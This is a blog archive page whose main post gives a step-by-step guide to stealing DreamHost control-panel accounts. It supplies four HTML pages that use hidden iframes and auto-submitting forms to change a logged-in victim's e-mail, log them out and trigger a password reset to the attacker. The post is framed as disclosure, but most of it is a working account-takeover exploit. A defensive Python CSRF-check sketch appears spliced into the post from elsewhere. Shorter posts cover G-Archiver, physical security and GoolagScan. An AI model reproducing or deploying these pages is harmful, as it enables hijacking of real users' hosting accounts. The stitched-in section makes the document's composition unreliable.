Security Related

Guy Mizrahi about Security and Technology.

Archive for the ‘Hacking’

How to Steal DreamHost accounts?

June 14, 2008 By: Guy Mizrahi Category: Hacking, Security

I thought a lot before posting this, but in the name of full disclosure...

This is the second time someone has tried to do this against my DreamHost account, so I guess it needs to be public.

It will work on any DreamHost customer who is logged in to his account (Note – if you use the logout button, it will not work on your account 🙂 ).

A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purposes and to make DreamHost fix it ASAP.

A short manual – how to steal DreamHost accounts (I guess that it can be used to steal any account that uses the same defective security mechanism).

So – How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatically change the contact details in the DreamHost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. Automatically log your mark off from DreamHost’s control panel.

3. Request a new password from DreamHost, sent to the new e-mail address.

The first page (let’s call it start.php):

    <html>
    <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
    <a1>This page can not be found</a1>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
    </iframe>
    </html>

As you can see, this page loads two iframes with 0.1% height and width so the mark can’t see them.

info.php:

    <html>
    <body>
    <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
    <input type=hidden name=tab value="contact">
    <input type=hidden name="command" value="submit_edit">
        <tr valign=top>
            <td id=txt align=right><b>Name:</b></td>
            <td><select name="prefix" id=frm>
                    <option value=""></option>
                    </select>
                    <input name="first" value="somename" size="8" id=frm>
                    <input name="middle" size="1" id=frm>
                    <input name="last" value="somefamily" size="8" id=frm>
                    <select name="suffix" id=frm>
                    <option value=""></option>
                    </select>
            </td>
        </tr>
        <tr valign=top>

            <td id=txt align=right><b>Address:</b></td>
            <td><input name="street1" value="somestreet" size=30 id=frm><br>
                    <input name="street2" size=30 id=frm><br>
                    <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
    </select>
            </td>
        </tr>
        <tr valign=top>
            <td id=txt align=right><b>Email:</b></td>
            <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>Phone:</b></td>
            <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>Fax:</b>*</td>
            <td><input name="fax" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>IM:</b>*</td>
            <td><input name="chat" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>URL:</b>*</td>
            <td><input name="url" size=30 id=frm></td>
        </tr>
        <tr>
            <td></td>
            <td id=txt>*optional information</td>
        </tr>
        <tr>
            <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
        </tr>
    </form>
    <script>
    document.asd.submit();
    </script>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0"></iframe>
    </body>
    </html>

As you can see – this page will change the mark’s DreamHost control panel details to whatever you want and then redirect to info3.php.

info3.php:

    <html>
    <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
    </iframe>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
    </html>

As you can see – info3.php does two things:

1. Logs your mark off from the DreamHost control panel.

2. Redirects to info2.html.

info2.html:

    <html>
    <body onload="document.getElementById('2').submit()">
    <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
    <input type="hidden" name="return_url" value="" />
    <input type="hidden" name="email_pwd_submitted" value="1" />
    <input name="email" class="text" value="somemail@somedomain.com">
    <input type="submit" class="button" value="Email me my password!">
    </form>
    </body>
    </html>

This last step sends a forgotten-password notice to the new email address.

That’s it – 4 pages and you can get any DreamHost account.
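The forged requests above get through because the panel acts on any request that arrives with the mark’s session cookie, whatever site sent it. The sketch below is an added example (not part of the original post, and not DreamHost’s code) of a server-side check that rejects them; the function names, the `csrf_token` field and `SERVER_KEY` are hypothetical, and the sample requests are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

PANEL_ORIGIN = "https://panel.dreamhost.com"   # origin taken from the forms above
SERVER_KEY = secrets.token_bytes(32)           # assumed per-deployment secret

def issue_token(session_id: str) -> str:
    """Token bound to one session; the panel embeds it in its own forms
    as a hidden field (here called csrf_token, a hypothetical name)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) is the panel itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == PANEL_ORIGIN

def check_request(method: str, headers: dict, session_id: str, form: dict):
    """Return (allowed, reason) for a state-changing panel request."""
    if method != "POST":
        return False, "state change over non-POST"
    if not same_origin(headers):
        return False, "cross-site origin"
    expected = issue_token(session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid token"
    return True, "ok"

# Constructed sample requests modelled on the pages above.
SESSION = "sess-constructed-1"
FORGED_EDIT = ("POST", {"Origin": "http://somedomain.com"}, SESSION,
               {"tab": "contact", "command": "submit_edit",
                "email": "somemail@somedomain.com"})
FORGED_LOGOUT = ("GET", {"Referer": "http://somedomain.com/info3.php"}, SESSION, {})
GENUINE_EDIT = ("POST", {"Origin": PANEL_ORIGIN}, SESSION,
                {"tab": "contact", "command": "submit_edit",
                 "email": "owner@example.org", "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for name, req in [("forged edit", FORGED_EDIT),
                      ("forged logout", FORGED_LOGOUT),
                      ("genuine edit", GENUINE_EDIT)]:
        print(name, check_request(*req))
```

Requiring the current password before the contact e-mail can be changed would break the chain even if a forged request did get past such a check.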

G-Archiver is exposing your Gmail account details.

March 12, 2008 By: Guy Mizrahi Category: Hacking, Security

“G-Archiver is your one click Gmail backup solution. Backup Gmail email messages”

The developer forgot to mention that G-Archiver also gives him the ability to hack into your Gmail account.

Read about it here:

http://www.codinghorror.com/blog/archives/001072.html

Physical Security

March 08, 2008 By: Guy Mizrahi Category: Hacking, Security

Johnny from IhackStuff gives a great 1-hour lecture about physical security, No Tech Hacking and the Ninja way of hacking 🙂

He talks great and gives a lot of stuff to think about.

You have to see this.

1 hour but worth every second.

GoolagScan

March 06, 2008 By: Guy Mizrahi Category: Hacking

Cult of the Dead Cow – the same guys that created Back Orifice (isn’t it amazing that the site is still online?) – released a tool that turns Google into a vulnerability search machine.

This new tool, Goolag Scan, allows everyone to detect web site vulnerabilities easily.

There is no new stuff here. Google hacking has been known for years and Johnny’s site is full of this kind of search phrase.

cDc just gave everyone (even guys with no knowledge) the option to test a site for vulnerabilities.

http://www.goolag.org

